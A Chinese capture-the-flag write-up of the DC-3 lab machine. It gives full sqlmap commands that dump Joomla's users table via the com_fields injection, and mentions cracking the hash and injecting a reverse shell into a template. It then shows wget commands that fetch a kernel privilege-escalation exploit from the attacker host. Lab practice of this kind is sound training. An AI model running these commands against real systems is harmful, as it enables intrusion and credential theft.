【DC系列03】DC-3靶机复盘
刚开始我的虚拟机导入靶机,打开时会出现这个错误,只需要添加一个硬盘就可以,选择IDE的。
然后我们扫描一下靶机ip地址
扫出来以后再单独扫描一下这个网站。
登陆这个ip以后指纹识别发现这个网站CMS是Joomla,我知道一个专门针对joomla的扫描工具,我们扫描一下。
我们扫描出两个重要内容,一个是joomla的版本,一个是他的登陆页面。
我们针对这个版本搜索一下他的漏洞,发现刚好有一个可以利用的,我们下载下来。
发现这是一个sql注入的漏洞,可以可以sqlmap这个工具实现sql注入,不懂的可以单独搜索一下sqlmap这个工具。
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password,username" --dump -p list[fullordering]
经过一系列操作我们成功拿到了一个账号密码,但是密码是密文的。
利用kali自带的john工具爆破一下密码,很快密码就出来了
尝试登陆了一下这个后台,发现成功登陆了上去。
在 这里面搜索了一圈,发现一个可以注入php代码的地方,经过尝试很轻易的就做了一个反弹shell。
这里面是有两个主页的模板,这里面有前端代码,可以自己新建php文件,也可以在原本php文件中插入代码。
我点进来以后在html文件下面找到了个php文件,然后插入了一段反弹shell。然后关闭这个页面,在最上面一行Close File。
点击预览,或者退出这个页面,重新点击这个模板。
kali这边就拿到了反弹shell。
用python美化一下命令行。
在这里面找了一圈并没有发现有什么可以利用的东西,就想到了内核漏洞,专门搜索了一下这个内核漏洞,发现这个系统的发行版本是16.06,内核版本是4.40。
搜索一下这个发行版本的漏洞,发现有合适的。
下载后cat一下,里面有一个提权代码的路径,我们wget一个这个zip,下载到我们本机上。
解压后发现两个文件,一个crasher.tar,一个exploit.tar,我们解压一下exploit.tar,解压出一个目录ebpf_mapfd_doubleput_exploit。
我们把ebpf_mapfd_doubleput_exploit里面的东西都拷贝到目标主机。
cd /tmp
wget 192.168.102.129/compile.sh
wget 192.168.102.129/doubleput.c
wget 192.168.102.129/hello.c
wget 192.168.102.129/suidhelper.c
然后我们运行./compil.sh。
运行完后出现一个doubleput文件,我们再运行一下./doubleput大概等1分钟就拿到root权限了。